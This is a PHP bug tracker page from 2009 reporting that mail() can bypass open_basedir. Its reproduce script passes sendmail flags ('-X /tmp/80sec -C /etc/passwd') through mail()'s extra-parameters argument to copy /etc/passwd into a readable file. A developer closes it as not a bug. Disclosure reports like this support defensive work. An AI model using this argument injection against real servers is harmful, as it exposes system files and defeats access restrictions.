PHP :: Bug #48229 :: mail() function open

Bug #48229	mail() function open_basedir bypass
Submitted:	2009-05-11 02:35 UTC	Modified:	2009-05-11 09:32 UTC
From:	root at 80sec dot com	Assigned:
Status:	Not a bug	Package:	Safe Mode/open_basedir
PHP Version:	5.2.9	OS:	linux
Private report:	No	CVE-ID:	None

View Developer Edit

Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.

Password:

Status:
Package:
Bug Type:
Summary:
From:	root at 80sec dot com
New email:
PHP Version:		OS:

New Comment:

[2009-05-11 02:35 UTC] root at 80sec dot com

Description:
------------
The mail function may bypass open_basedir or read/write arbitrary
 file.

Reproduce code:
---------------
<?php
$to = 'jianxin@80sec.com'.str_repeat("x",10000);
$subject = 'the subject'.str_repeat("x",10);
$message = 'hello'.str_repeat("x",10);
mail($to, $subject, $message, $headers,"-v -bt -X /tmp/80sec -d13 -C /etc/passwd");
?>

Expected result:
----------------
we can get the contents of /etc/passwd in /tmp/80sec.

Actual result:
--------------
we can get the contents of /etc/passwd in /tmp/80sec.

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2009-05-11 09:32 UTC] jani@php.net

Enable safe-mode.

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2025 The PHP Group All rights reserved.	Last updated: Thu Jul 10 12:01:33 2025 UTC